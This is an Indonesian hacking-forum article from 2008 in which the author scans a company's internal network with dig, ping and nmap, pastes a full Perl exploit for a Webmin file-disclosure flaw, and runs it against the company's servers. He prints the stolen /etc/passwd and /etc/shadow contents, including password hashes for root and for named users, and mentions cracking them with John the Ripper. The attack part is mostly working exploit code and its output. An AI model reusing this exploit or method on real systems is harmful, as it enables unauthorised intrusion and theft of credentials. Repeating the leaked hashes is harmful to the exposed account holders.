www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 5
0 Members | 5 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2890
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 5:56 pm
Articles
By thesims
Published: January 13, 2008
Print    Email

Hmm pagi-pagi seperti biasa … pergi ke kantor pake motor , motor ini sebagai 3 tahun perjuangan gw sampe gw bisa bekerja di salah satu perusahaan walau gw Cuma outsource itulah aktifitas gw huh hari libur gw masuk kebetulan ronda pagi … sampe kantor iseng-iseng oprek server buatan sendiri walhasil mayan deh kegunaannya mulai dari simpen-simpen file buat remote-remote ke network sampe buat mp3 streaming huh daripada idle tuh server, gw nyalain kompie gw coba ngenet aahhh ternyata gateway nya down kesel … mana gw lagi butuh buat browsing gipula neh akses drop semua … iseng-iseng gw traceroute wah ternyata bukan di hop si gateway server melainkan routing kearah luar alias ip publik , inget banget gw neh pake router cisco … ahh gw cuekin aja dulu deh masalah layer 3 ini , beralih ke layer 7 dulu…
Keabisan ide gw kepala mikir-dan mikir apa ya kayaknya ada kejanggalan ohh iyaaa !!! seperti ada lampu neon dikepala gw , dulu pernah ada temen bilang pake aja bal proxy.sibiru.co.id ..
Hmm isengiseng gw mo tau nih proxy resolv kemana ya ….

Neh hasil nya

[iqbal@boc ~]$ dig proxies.sibiru.co.id

; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;proxies.sibiru.co.id. IN A

;; ANSWER SECTION:
proxies.sibiru.co.id. 384 IN A 10.1.10.19
proxies.sibiru.co.id. 384 IN A 10.1.10.17
proxies.sibiru.co.id. 384 IN A 10.1.10.18

;; AUTHORITY SECTION:
sibiru.co.id. 384 IN NS ns.sibiru.co.id.
sibiru.co.id. 384 IN NS ns0.sibiru.co.id.
sibiru.co.id. 384 IN NS ldap.sibiru.co.id.
sibiru.co.id. 384 IN NS pusren01.risti.sibiru.co.id.

;; ADDITIONAL SECTION:
ns.sibiru.co.id. 384 IN A 10.2.1.5
ns0.sibiru.co.id. 384 IN A 10.2.12.12
ldap.sibiru.co.id. 384 IN A 10.1.2.38

;; Query time: 3 msec
;; SERVER: 10.11.15.220#53(10.11.15.220)
;; WHEN: Sun Jan 13 20:57:32 2008
;; MSG SIZE rcvd: 217


Nah lihat yang dicetak tebal …. Ada 3 server nih gw coba test ping dulu mana yang reply

[iqbal@boc ~]$ ping 10.1.10.19
PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data.
64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms
64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms
64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms
64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms
64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms

--- 10.1.10.19 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms
[iqbal@boc ~]$ ping 10.1.10.17
PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data.
64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms
64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms
64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms

--- 10.1.10.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms
[iqbal@boc ~]$ ping 10.1.10.18
PING 10.1.10.18 (10.1.10.1 56(84) bytes of data.
64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms
64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms
64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms
64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms

--- 10.1.10.18 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms


Wow keren … semua nya reply berarti proxynya gw tinggal cari nih port proxynya berikut hasil scan port yang gw lakukan

[iqbal@boc ~]$ nmap 10.1.10.17-19

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT
Interesting ports on 10.1.10.17:
Not shown: 1673 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6000/tcp filtered X11
8080/tcp open http-proxy
8443/tcp open https-alt
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.18:
Not shown: 1672 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
654/tcp open unknown
669/tcp open unknown
744/tcp open flexlm
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.19:
Not shown: 1671 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
698/tcp open unknown
713/tcp open unknown
841/tcp open unknown
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds

Wah diotak gw makin tanda tanya kayaknya 10000 itu untuk webmin ya , padahal gw Cuma cari proxy aja loh… kebeneran deh sekalian gw pengen tau juga apakah ada hole nya tuh server. Usut punya usut ketemu di website http://www.milw0rm.com/exploits/2017 gw copy paste deh tuh jadi file webmin.pl berikut deh exploit webminnya


[iqbal@boc expl]$ cat webmin.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
print("Usage: $0 ";
print("TARGETS are ";
print("0 - > HTTP ";
print(" 1 - > HTTPS ";
print("Define full path with file name ";
print("Example: ./webmin.pl blah.com 10000 /etc/passwd ";
exit(1);
}

($target, $port,$filename, $tar) = @ARGV;

print("WEBMIN EXPLOIT !!!!! coded by UmZ! ";
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com ";
print("Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! ";
print("Attacking $target on port $port! ";
print("FILENAME: $filename ";


$temp="/..%01" x 40;

if ($tar == '0'
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;

print(" FILE CONTENT STARTED";
print(" ----------------------------------- ";

print("$content";
print(" ------------------------------------- ";
}


elsif ($tar == '1'
{
my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
my $req = HTTP::Request->new(GET => $url);
my $res = $userag->request($req);
if ($res->is_success) {
print("FILE CONTENT STARTED ";
print("------------------------------------------- ";
print $res->as_string;
print("------------------------------------------- ";
}
else {
print "Failed: ", $res->status_line, " ";
}
}

# milw0rm.com [2006-07-15]

[iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.18 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

Gagal nih

[iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.19 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

Hasil diatas juga gagal

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:42:31 GMT
Server: MiniServ/0.01
Content-Length: 1190
Content-Type: text/plain
Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT
Client-Date: Fri, 11 Jan 2008 03:13:02 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/bin/sh
daemon:2:2:daemon:/sbin:/bin/sh
adm:3:4:adm:/var/adm:/bin/sh
lp:4:7:lp:/var/spool/lpd:/bin/sh
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/bin/sh
news:9:13:news:/var/spool/news:/bin/sh
uucp:10:14:uucp:/var/spool/uucp:/bin/sh
nobody:65534:65534:Nobody:/:/bin/sh
rpm:13:101:system user for rpm:/var/lib/rpm:/bin/false
vcsa:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:70:70:system user for portmap:/:/bin/false
xfs:71:71:system user for XFree86:/etc/X11/fs:/bin/false
postfix:72:72:system user for postfix:/var/spool/postfix:/bin/false
rpcuser:73:73:system user for nfs-utils:/var/lib/nfs:/bin/false
squid:74:74:system user for squid:/var/spool/squid:/bin/false
sshd:75:75:system user for openssh:/var/empty:/bin/true
admin:501:501:admin:/home/admin:/bin/bash
apache:76:76:system user for apache2:/var/www:/bin/sh
mysql:77:77:system user for MySQL:/var/lib/mysql:/bin/bash
iscan:503:503::/:/bin/false
bowo:505:505::/home/bowo:/bin/bash
bayu:506:506:Ariya Bayu:/home/bayu:/bin/bash

Wah masuk tuh ……… I got u …………..

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:43:22 GMT
Server: MiniServ/0.01
Content-Length: 800
Content-Type: text/plain
Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT
Client-Date: Fri, 11 Jan 2008 03:13:51 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:$1$0R.FZtLM$WlBgN6.5NKBN7OafXgqNQ/:12887:0:99999:7:::
bin:*:12515:0:99999:7:::
daemon:*:12515:0:99999:7:::
adm:*:12515:0:99999:7:::
lp:*:12515:0:99999:7:::
sync:*:12515:0:99999:7:::
shutdown:*:12515:0:99999:7:::
halt:*:12515:0:99999:7:::
mail:*:12515:0:99999:7:::
news:*:12515:0:99999:7:::
uucp:*:12515:0:99999:7:::
nobody:*:12515:0:99999:7:::
rpm:!!:12515:0:99999:7:::
vcsa:!!:12515:0:99999:7:::
rpc:!!:12515:0:99999:7:::
xfs:!!:12515:0:99999:7:::
postfix:!!:12515:0:99999:7:::
rpcuser:!!:12515:0:99999:7:::
squid:!!:12515:0:99999:7:::
sshd:!!:12515:0:99999:7:::
admin:$1$lUbNGfKl$4/v4BWtT5bHGD.VDHa6cN/:12887:0:99999:7:::
apache:!!:12515:0:99999:7:::
mysql:!!:12515:0:99999:7:::
iscan:!!:12516:0:99999:7:::
bowo:$1$1I4B/3.T$tmnE.Za1kqrM5y8QGLYmS.:12550:0:99999:7:::
bayu:!!:12848:0:99999:7:::


Ternyata si 10.1.10.17 ada holenya di webmin … wah bisa intip /etc/passwd /etc/shadow … hmm awalnya cari proxy malah ketemu begini ahh sudahlah gw copy paste aja tuh /etc/passwd dan /etc/shadow… mungkin suatu saat berguna … dan mayan deh bisa intip … besoknya gw report masalah ini ke si empunya ternyata dibales deh …. walaupun bisa dioprek dengan john the ripper atau cari slocate.db ( cari *.conf plain text password ) hihiihhi

 Thanks to : Allah SWT … , Cyberlog : Sori baru bisa kirim artikel nih walaupun cuma begini aja gw doain semoga istri lo sehat walafiat … , AdhietSlank : Gimana kabar si doi lo kan jadi nikah gan tuh buru nikah deh lo , k1nk0n9 : yang masih sibuk ama kerjaan barunya yeh makan-makannya mana nih … , Fl3xu5 : masih sibuk ama kulnya yeh … terus belajar bos jangan patah semangat , Sukam : dimana kau cok kapan kita ketemu lagi lay … , Ariee & Rini : Thanks support dan dukungannya semoga anak lo menjadi anak yang berguna map belum sempet ketemu si kecil and Ariee BTS ama badan lo beratan badan lo heheheh … A-technique : Sori SOB gw lom sempet ke depok lagi … by ym an aja wit hehehe , Jantap : Hhehee Manager lapangan : banyak ilmunya neh orang mengenai perhitungan BTS sukses terus … Letjen : sekolah hokum Cuma hobi computer nyambung juga jadi pengacara gw nih … gratisan ya … sukses buat semua , ibnu : kirim daku pyramid donk sekalian juga spinx nnya yaaaaaa …….. , z3r0byt3 : gimana pak masih ngajar kah di bekasi ntar kapan mau kerumah situ minta pencerahan , temen-temen kantor BOC : lets handling it okay , salam TheSimS aka Iqbal@sekuritionline.net


Nb :

Mohon maaf jika ada pihak yang dirugikan karena tujuan ini sebagai pembelajaran dan bukan tujuan untuk memanfaatkan sebuah kelemahan system dan sifatnya tidak untuk menjatuhkan dan buat admin rajin-rajin aja patching systemnya tuh webminnya ada hole tuh



View Comments (0)